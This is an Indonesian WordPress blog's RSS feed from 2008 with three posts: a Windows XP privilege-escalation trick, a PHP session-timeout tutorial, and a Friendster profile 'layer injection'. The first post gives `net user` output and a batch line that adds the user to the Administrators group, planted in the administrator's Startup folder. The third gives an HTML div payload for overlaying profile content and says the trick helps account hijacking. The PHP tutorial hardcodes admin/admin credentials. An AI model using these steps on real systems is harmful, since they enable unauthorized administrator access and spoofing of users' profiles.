<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Koock</title>
	<atom:link href="http://koock.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://koock.wordpress.com</link>
	<description>Be Webmaster Here !</description>
	<lastBuildDate>Thu, 18 Dec 2008 03:25:26 +0000</lastBuildDate>
	<language>id</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='koock.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Koock</title>
		<link>http://koock.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://koock.wordpress.com/osd.xml" title="Koock" />
	<atom:link rel='hub' href='http://koock.wordpress.com/?pushpress=hub'/>
		<item>
		<title>MENDAPATKAN AKSES ADMIN WINDOWS XP. by_anjar</title>
		<link>http://koock.wordpress.com/2008/12/18/mendapatkan-akses-admin-windows-xp/</link>
		<comments>http://koock.wordpress.com/2008/12/18/mendapatkan-akses-admin-windows-xp/#comments</comments>
		<pubDate>Thu, 18 Dec 2008 03:18:18 +0000</pubDate>
		<dc:creator>koock</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://koock.wordpress.com/2008/12/18/mendapatkan-akses-admin-windows-xp/</guid>
		<description><![CDATA[Windows XP yang file systemnya adalah Fat32 memperbolehkan user biasa untuk mengakses direktory home dari admin yang (biasanya) terletak pada lokasi berikut: C:\Documents and Settings\Administrator\ Sedangkan pada Windows XP yang ber file system NTFS, user biasa tidak akan bisa mengakses direktory home dari admin. //&#8212;net user User accounts for \\spyroNET &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; Administrator Guest spyro HelpAssistant [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=136&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p> Windows XP yang file systemnya adalah Fat32 memperbolehkan user biasa untuk mengakses direktory home dari admin yang (biasanya) terletak pada lokasi berikut:</p>
<p>C:\Documents and Settings\Administrator\</p>
<p>Sedangkan pada Windows XP yang ber file system NTFS, user biasa tidak akan bisa mengakses direktory home dari admin.<span id="more-136"></span></p>
<p>//&#8212;net user </p>
<p>User accounts for \\spyroNET</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>Administrator   Guest  spyro<br />
HelpAssistant SUPPORT_388945a0 SuperUser<br />
The command completed successfully.</p>
<p>MELIHAT HAK AKSES USER<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>C:\DOCUME~1\spyro&gt;net user SuperUser<br />
User name SuperUser<br />
Full Name<br />
Comment<br />
User&#8217;s comment<br />
Country code 000 (System Default)<br />
Account active Yes<br />
Account expires Never</p>
<p>Password last set 7/12/2004 3:38 AM<br />
Password expires Never<br />
Password changeable 7/12/2004 3:38 AM<br />
Password required Yes<br />
User may change password Yes</p>
<p>Workstations allowed All<br />
Logon script<br />
User profile<br />
Home directory<br />
Last logon 7/12/2004 11:16 PM</p>
<p>Logon hours allowed All</p>
<p>Local Group Memberships *Administrators<br />
Global Group memberships *None<br />
The command completed successfully.</p>
<p>Kini kita sudah tau siapa yang menjadi Administrator. Buatlah script batch seperti berikut:</p>
<p>net localgoup Administrators spyro /add</p>
<p>Simpan di lokasi berikut:<br />
C:\Documents and Settings\SuperUser\Start Menu\Programs\Startup</p>
<p>Tunggu sang admin untuk login&#8230; setelah itu, level kita sudah setingkat admin <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/koock.wordpress.com/136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/koock.wordpress.com/136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/koock.wordpress.com/136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/koock.wordpress.com/136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/koock.wordpress.com/136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/koock.wordpress.com/136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/koock.wordpress.com/136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/koock.wordpress.com/136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/koock.wordpress.com/136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/koock.wordpress.com/136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/koock.wordpress.com/136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/koock.wordpress.com/136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/koock.wordpress.com/136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/koock.wordpress.com/136/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=136&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://koock.wordpress.com/2008/12/18/mendapatkan-akses-admin-windows-xp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/971d714542fe8c92c45aad3bd99da84b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">koock</media:title>
		</media:content>
	</item>
		<item>
		<title>sript pengatur waktu session, log out otomatis. by_anjar</title>
		<link>http://koock.wordpress.com/2008/12/18/sript-pengatur-waktu-session-log-out-otomatis/</link>
		<comments>http://koock.wordpress.com/2008/12/18/sript-pengatur-waktu-session-log-out-otomatis/#comments</comments>
		<pubDate>Thu, 18 Dec 2008 03:09:21 +0000</pubDate>
		<dc:creator>koock</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://koock.wordpress.com/2008/12/18/sript-pengatur-waktu-session-log-out-otomatis/</guid>
		<description><![CDATA[Posted By: Anjar Script pengatur waktu Session, Logout Otomatis Halaman Ini dibaca 1356 kali Banyak hal terjadi jika seseorang telah berhasil login sebagai user, dan tentunya login ini ada ketika user akan memanfaatkan layanan dari suatu website, bukan karena sebab yang lain, seperti tingkat sekuritas yang buruk. Selalu ada masa idle. Idle di sini bermakna [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=132&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<td align="left">
<p>Posted By: <b>Anjar</b></p>
<p><font class="judul_content"></p>
<div id="zzz">
<h1>
Script pengatur waktu Session, Logout Otomatis</h1>
</div>
<p></font><br />
Halaman Ini dibaca 1356 kali</p>
<div></div>
<p>
<img src="http://koock.files.wordpress.com/2008/12/png-logout.png?w=256&#038;h=256" alt="png-logout" title="png-logout" width="256" height="256" class="alignnone size-full wp-image-133" /></p>
<p>Banyak<br />
hal terjadi jika seseorang telah berhasil login sebagai user, dan<br />
tentunya login ini ada ketika user akan memanfaatkan layanan dari suatu<br />
website, bukan karena sebab yang lain, seperti tingkat sekuritas yang<br />
buruk. Selalu ada masa idle. Idle di sini bermakna user tidak melakukan<br />
apa-apa sama sekali di website tersebut, tidak berpindah halaman, tidak<br />
memasukkan input pada form manapun, dan tidak ada hal apapun yang<br />
menyebabkan sebuah halaman website terrefresh, dengan kata lain user<br />
tidak melakukan apa pun pada website yang sedang dia kunjungi. Sungguh<br />
user yang aneh. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> ~~. Tapi hal seperti ini dapat terjadi jika user<br />
sedang asik mengunjungi website yang lain, dan lupa akan website yang<br />
dia kunjungi sebelumnya. <span id="more-132"></span>Tentunya keadaan user pada website yang<br />
dikunjungi sebelumnya dianggap sebagai condition yang idle oleh website<br />
tersebut. Tidak ada hal apapun yang terjadi di website sebelumnya. Atau<br />
kondisi lain, dimana seorang user yang telah 10 menit meninggalkan<br />
pc-nya dalam keadaan lupa melogout accountnya. Sungguh terlalu. Di<br />
sinilah fungsi pengatur waktu session benar-benar dibutuhkan. <br />Ada<br />
dua cara untuk mengatur waktu session, yang pertama adalah merubah<br />
konfigurasi session timeout pada php.ini, cara yang terakhir yaitu<br />
dengan memanfaatkan fungsi time() dan variable session yang telah<br />
teregistrasi, dengan kata lain cara yang terakhir ini adalah merancang<br />
barisan code yang dapat mengatur waktu session. Penulis tidak akan<br />
menjelaskan cara yang pertama. Tapi yang akan penulis jelaskan adalah<br />
cara yang kedua. Penulis akan mengambil sebuah contoh kasus, ini untuk<br />
memudahkan penjelasan secara logika, dan penjelasan alur dari cara<br />
kerja script yang akan dibuat.<br />Kasusnya seperti ini, “Ketika user<br />
telah berhasil login, akan ada sebuah session yang digunakan sebagai<br />
patokan untuk membandingkan berapa lama user telah berada pada halaman<br />
website tersebut. Apabila waktu time() yang berjalan lebih besar dari<br />
nilai session dari variable yang dijadikan sebagai patokan nanti maka<br />
user tersebut akan secara otomatis terlogout”.</p>
<p>Secara struktur, algoritmanya akan seperti ini : </p>
<ol>
<li>Sediakan sebuah variable x, berisi waktu sekarang ditambah 30 detik. </li>
<li>Jadikan<br />
variable x tersebut sebagai session, yang akan membypass valuenya pada<br />
setiap halaman, dengan kata lain, isi variable x tersebut dapat<br />
ditampilkan di halaman mana pun. </li>
<li>Bandingkan waktu sekarang dengan nilai dari variable x tersebut.</li>
<li>Jika waktu sekarang lebih kecil dari nilai variable x tersebut, maka si user masih dalam keadaan login.</li>
<li>Jika waktu sekarang lebih besar dari nilai variable x tersebut, maka keadaan si user adalah logout. </li>
<li>Jika<br />
user melakukan refresh halaman, berpindah halaman, mengisi form,<br />
sebelum masa sessionnya habis maka waktu login di tambah 10 menit<br />
berikutnya.</li>
</ol>
<p>Ya, untuk algoritma di atas penulis bagi<br />
menjadi 2 function, yakni function login_validate() dan login_check().<br />
Langsung saja persiapkan script yang dibutuhkan : </p>
<p>File <span style="font-weight:bold;">index.php</span>&nbsp; : </p>
<p><span style="color:rgb(51,51,255);">&lt;?php</span><br /><span style="color:rgb(51,51,255);">require_once &#8220;functions.php&#8221;;</span><br /><span style="color:rgb(51,51,255);">if (( $_POST['username'] == &#8216;admin&#8217; ) &amp;&amp; ( $_POST['password'] == &#8216;admin&#8217;)) </span><br /><span style="color:rgb(51,51,255);">{</span><br /><span style="color:rgb(51,51,255);">$_SESSION['user'] = $_POST['username'];</span><br /><span style="color:rgb(51,51,255);">login_validate();</span><br /><span style="color:rgb(51,51,255);">header(&#8220;location: admin.php&#8221;);</span><br /><span style="color:rgb(51,51,255);">}</span></p>
<p><span style="color:rgb(51,51,255);">else if ( empty($_POST['username']) &amp;&amp; empty($_POST['password']) )</span><br /><span style="color:rgb(51,51,255);">{</span><br /><span style="color:rgb(51,51,255);">header(&#8220;location: login.php&#8221;);</span><br /><span style="color:rgb(51,51,255);">}</span></p>
<p><span style="color:rgb(51,51,255);">?&gt;</span></p>
<p>Selanjutnya file intinya yaitu,<br /><span style="font-weight:bold;">functions.php : </span></p>
<p><span style="color:rgb(51,51,255);">&lt;?php</span><br /><span style="color:rgb(51,51,255);">session_start();</span></p>
<p><span style="color:rgb(51,51,255);">function login_validate() {</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; $timeout = 30; </span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; $_SESSION["expires_by"] = time() + $timeout;</span><br /><span style="color:rgb(51,51,255);">}</span></p>
<p><span style="color:rgb(51,51,255);">function login_check() {</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; $exp_time = $_SESSION["expires_by"];</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; if (time() &lt; $exp_time) {</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; login_validate();</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return true; </span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; } else {</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unset($_SESSION["expires_by"]);</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return false; </span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; }</span><br /><span style="color:rgb(51,51,255);">}</span><br /><span style="color:rgb(51,51,255);">?&gt;</span></p>
<p>Kemudian<br />
admin.php, barisan code dalam admin.php ini penulis ibaratkan seperti<br />
kondisi dari admin yang telah berhasil login. Jika lebih dari 30 detik<br />
maka user secara otomatis akan di logout.&nbsp; Nilai 30 detik ini<br />
diambil dari variable $timeout yang ada di functions.php.</p>
<p>File <span style="font-weight:bold;">Admin.php : </span></p>
<p><span style="color:rgb(51,51,255);">&lt;?</span><br /><span style="color:rgb(51,51,255);">require_once &#8220;functions.php&#8221;;</span></p>
<p><span style="color:rgb(51,51,255);">if (ISSET($_SESSION['user']))</span><br /><span style="color:rgb(51,51,255);">{</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; if (!login_check()) {</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; header(&#8220;Location: logout.php&#8221;);</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; exit(0);</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; else {</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; echo &#8220;Jika tidak ada kegiatan sama sekali, anda akan logout secara otomatis &#8230; &#8220;;</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }&nbsp;&nbsp;&nbsp; </span><br /><span style="color:rgb(51,51,255);">}</span></p>
<p><span style="color:rgb(51,51,255);">else</span><br /><span style="color:rgb(51,51,255);">{</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; echo &#8220;Anda tidak berhak untuk ngapa-ngapain &#8230; !! <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> &#8220;;</span><br /><span style="color:rgb(51,51,255);">}</span></p>
<p><span style="color:rgb(51,51,255);">?&gt;</span></p>
<p>Selanjutnya halaman login usernya, <span style="font-weight:bold;">login.php : </span></p>
<p><span style="color:rgb(51,51,255);">&lt;html&gt;</span><br /><span style="color:rgb(51,51,255);">&lt;head&gt;&lt;title&gt;Login Page &#8230;!&lt;/title&gt;&lt;/head&gt;</span><br /><span style="color:rgb(51,51,255);">&lt;body&gt;</span><br /><span style="color:rgb(51,51,255);">&lt;form action=index.php method=POST&gt;</span><br /><span style="color:rgb(51,51,255);">&lt;table<br />
border=0<br />
bcolor=#DFDFDF&gt;&lt;tr&gt;&lt;td&gt;username&lt;/td&gt;&lt;td&gt;&lt;input<br />
type=text name=username&gt;&lt;/td&gt;&lt;/tr&gt;</span><br /><span style="color:rgb(51,51,255);">&lt;tr&gt;&lt;td&gt;password&lt;/td&gt;&lt;td&gt;&lt;input type=password name=password&gt;&lt;/td&gt;&lt;/tr&gt;</span><br /><span style="color:rgb(51,51,255);">&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;&lt;input type=submit name=submit value=submit&gt;&lt;/td&gt;&lt;/tr&gt;</span><br /><span style="color:rgb(51,51,255);">&lt;/table&gt;</span><br /><span style="color:rgb(51,51,255);">&lt;/form&gt;</span><br /><span style="color:rgb(51,51,255);">&lt;/body&gt;</span><br /><span style="color:rgb(51,51,255);">&lt;/html&gt;</span></p>
<p>Terlihat<br />
jelas pada baris ke 4 di atas, halaman login page memiliki action,<br />
menuju index.php, yang kemudian menghasilkan 2 variable POST, yaitu<br />
$_POST[‘username’], dan $_POST[‘password’]. Kedua variable inilah yang<br />
kemudian dicek pada halaman index.php. </p>
<p>Dan yang terakhir adalah <span style="font-weight:bold;">logout.php : </span></p>
<p><span style="color:rgb(51,51,255);">&lt;?php</span><br /><span style="color:rgb(51,51,255);">require_once &#8220;functions.php&#8221;;</span></p>
<p><span style="color:rgb(51,51,255);">unset($_SESSION['user']);</span><br /><span style="color:rgb(51,51,255);">session_destroy();</span><br /><span style="color:rgb(51,51,255);">header(&#8220;location: login.php&#8221;);</span></p>
<p><span style="color:rgb(51,51,255);">?&gt;</span></p>
<p>Cara kerja source code di atas cukup sederhana, lihat barisan code index.php, </p>
<p><span style="color:rgb(51,51,255);">&#8230;&#8230;</span><br /><span style="color:rgb(51,51,255);">if (( $_POST['username'] == &#8216;admin&#8217; ) &amp;&amp; ( $_POST['password'] == &#8216;admin&#8217;)) </span><br /><span style="color:rgb(51,51,255);">{</span><br /><span style="color:rgb(51,51,255);">$_SESSION['user'] = $_POST['username'];</span><br /><span style="color:rgb(51,51,255);">login_validate();</span><br /><span style="color:rgb(51,51,255);">header(&#8220;location: admin.php&#8221;);</span><br /><span style="color:rgb(51,51,255);">}</span></p>
<p><span style="color:rgb(51,51,255);">else if ( empty($_POST['username']) &amp;&amp; empty($_POST['password']) )</span><br /><span style="color:rgb(51,51,255);">{</span><br /><span style="color:rgb(51,51,255);">header(&#8220;location: login.php&#8221;);</span><br /><span style="color:rgb(51,51,255);">}</span><br /><span style="color:rgb(51,51,255);">&#8230;.</span></p>
<p>Penjelasannya<br />
adalah sebagai berikut, Jika user memasukkan username dan password yang<br />
cocok ( dalam kasus ini username dan passwordnya adalah admin ) maka<br />
user akan diberikan sebuah variable session, yakni<br />
$_SESSION['user'],&nbsp; dan akan ditambahkan sebuah variable baru yang<br />
nantinya variable ini berfungsi sebagai timer,<br />
yakni&nbsp;&nbsp;&nbsp;&nbsp; </p>
<p><span style="color:rgb(51,51,255);">$timeout = 30; </span></p>
<p>Variable<br />
tersebut berada dalam fungsi login_validate() pada script<br />
functions.php. Sedangkan masih dalam fungsi login_validate, lompat ke<br />
barisan code dibawahnya yaitu : </p>
<p><span style="color:rgb(51,51,255);">$_SESSION["expires_by"] = time() + $timeout;</span></p>
<p>Disinilah<br />
letak timer yang sebenarnya, kehebatan dari session adalah dapat<br />
melakukan passing value walaupun halamannya berbeda. Jelasnya<br />
$_SESSION["expires_by"] mengambil nilainya dari waktu ketika user<br />
pertama kali login yaitu time() di tambah dengan 30 detik kedepannya,<br />
yakni isi dari variable $timeout. </p>
<p>Nah, dari situ, lihat ke bagian fungsi yang ada di bawahnya, pada functions.php : </p>
<p>&#8230;<br /><span style="color:rgb(51,51,255);">function login_check() {</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; $exp_time = $_SESSION["expires_by"];</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; if (time() &lt; $exp_time) {</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; login_validate();</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return true; </span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; } else {</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unset($_SESSION["expires_by"]);</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return false; </span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; }</span><br /><span style="color:rgb(51,51,255);">}</span><br />&#8230;.</p>
<p>Ya,&nbsp; lihat baris :&nbsp; <br /><span style="color:rgb(51,51,255);">$exp_time = $_SESSION["expires_by"]; </span></p>
<p>Varibale $exp_time itu memiliki nilai dari $_SESSION["expires_by"],<br />Untuk<br />
kejelesannya penulis berikan contoh seperti ini, jika user login pada<br />
waktu jam 5, maka $_SESSION["expires_by"] berisi jam ke 5,&nbsp; menit<br />
ke 0, dan detik ke 30. Dan secara alami pun diketahui bahwa yang<br />
namanya waktu pasti akan terus bertambah tentunya. Tapi karena berada<br />
dalam fungsi, variable $_SESSION["expires_by"] ini tidak akan<br />
bertambah, walaupun time() terus berlanjutnya. </p>
<p>Lompat ke baris selanjutnya : <br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; if (time() &lt; $exp_time) {</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; login_validate();</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return true; </span></p>
<p>Dalam<br />
baris tersebut sederhananya adalah, jika waktu yang sekarang berjalan<br />
lebih kecil nilainya dari nilai yang ada pada<br />
$_SESSION["expires_by"],&nbsp; maka tambahkan 30 detik lagi, dan jika<br />
waktu pada time() sama dengan nilai $_SESSION["expires_by"] maka user<br />
akan otomatis logout </p>
<p>Selanjutnya &#8230; <br />&#8230;<br /><span style="color:rgb(51,51,255);">else {</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unset($_SESSION["expires_by"]);</span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return false; </span><br /><span style="color:rgb(51,51,255);">&nbsp;&nbsp;&nbsp; }</span><br />&#8230;</p>
<p>Jika waktu yang sekarang berjalan itu lebih besar dari nilai yang ada pada $_SESSION["expires_by"], maka lakukan logout. </p>
<p>Script tersebut dapat di download di sini <br /><a href="http://networkandgame.890m.com/ilmuwebsite/article/session-time-by-alk.zip" target="_self">http://networkandgame.890m.com/ilmuwebsite/article/session-time-by-alk.zip</a><br />Cukup jelas ya. Jika ada yang di tanyakan, silahkan layangkan pertanyaan ke email penulis. alkemail@gmail.com. </p>
<p>Greetz<br />
: b_scorpio, abuzahra, peterpanz, kandar, phii_, syahrilrohman, ivan,<br />
dr.emi, safril, najwa. Special for jojo. <img src='http://s2.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> . Hi, Jo! Have a nice day. </p>
</td>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/koock.wordpress.com/132/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/koock.wordpress.com/132/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/koock.wordpress.com/132/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/koock.wordpress.com/132/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/koock.wordpress.com/132/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/koock.wordpress.com/132/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/koock.wordpress.com/132/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/koock.wordpress.com/132/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/koock.wordpress.com/132/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/koock.wordpress.com/132/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/koock.wordpress.com/132/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/koock.wordpress.com/132/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/koock.wordpress.com/132/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/koock.wordpress.com/132/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=132&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://koock.wordpress.com/2008/12/18/sript-pengatur-waktu-session-log-out-otomatis/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/971d714542fe8c92c45aad3bd99da84b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">koock</media:title>
		</media:content>

		<media:content url="http://koock.files.wordpress.com/2008/12/png-logout.png" medium="image">
			<media:title type="html">png-logout</media:title>
		</media:content>
	</item>
		<item>
		<title>friendster layer injection. by_anjar</title>
		<link>http://koock.wordpress.com/2008/12/18/friendster-layer-injection/</link>
		<comments>http://koock.wordpress.com/2008/12/18/friendster-layer-injection/#comments</comments>
		<pubDate>Thu, 18 Dec 2008 03:03:19 +0000</pubDate>
		<dc:creator>koock</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[fs]]></category>

		<guid isPermaLink="false">http://koock.wordpress.com/2008/12/18/friendster-layer-injection/</guid>
		<description><![CDATA[what&#8217;s fs&#8217;s layer injection actually? ..well , the goal of layer injection is to put a new layer above all other layers in modification of personal fs profile. With this trick , you&#8217;ll be able to cheat your fs profile ,and further more , this trick is also very useful in accountZ hijacking !(i won&#8217;t [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=131&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>what&#8217;s fs&#8217;s layer injection actually? ..well , the goal of layer injection is to put a new layer above all other layers in modification of personal fs profile. With this trick , you&#8217;ll be able to cheat your fs profile ,and further more , this trick is also very useful in accountZ hijacking !(i won&#8217;t publish this one) hEHEHE..<span id="more-131"></span></p>
<p>Ok,let&#8217;s move on, the main mistake that fs ever made is that they enable their users to put HTML tag on their personal profile.. that&#8217;s the core part of this injection. Let&#8217;s try the simplest layer injection to cheat the FS logo which always appears on the left-top on your profile.</p>
<p>-&gt; go to &#8216;edit profile&#8217; page.</p>
<p>-&gt; select which form you want to inject from. (i prefer &#8216;about me&#8217;).</p>
<p>-&gt; insert a modified html-layer tag (div) like this :</p>
<p>&lt;
<div align="left">
<div id="Layer1" style="border-right:#000000 1px;border-top:#000000 1px;z-index:1;left:0;border-left:#000000 1px;width:500px;border-bottom:#000000 1px;position:absolute;top:0;height:76px;background-color:#000000;"><img src="http://foto-foto.com/introvertster.jpg" /></p>
</p>
<p>-&gt; Core tags explanation:</p>
<p>DIV align=left &#8212; to set the layer&#8217;s aligh to &#8216;left&#8217;.</p>
<p>DIV id=Layer1 &#8212; to make fs pretends that the injected layer is the &#8216;main layer&#8217;<br />
which covers other layers.</p>
<p>POSITION: absolute &#8212; to make the layer&#8217;s position to be absolute , so the screen&#8217;s size won&#8217;t disturb it.</p>
<p>HEIGHT: 76px &#8212;&gt; set the size of the area u want to cover with your layer.</p>
<p>WIDHT:500px</p>
<p>IMG SRC &#8212;-&gt; insert your image-url-path. (your new logo)<br />
<img src="http://koock.files.wordpress.com/2008/12/friendsterlayerinjection.jpg?w=468&#038;h=263" alt="friendsterlayerinjection" title="friendsterlayerinjection" width="468" height="263" class="alignnone size-full wp-image-130" /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/koock.wordpress.com/131/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/koock.wordpress.com/131/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/koock.wordpress.com/131/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/koock.wordpress.com/131/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/koock.wordpress.com/131/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/koock.wordpress.com/131/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/koock.wordpress.com/131/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/koock.wordpress.com/131/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/koock.wordpress.com/131/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/koock.wordpress.com/131/" /></a> <a rel="nofollow" 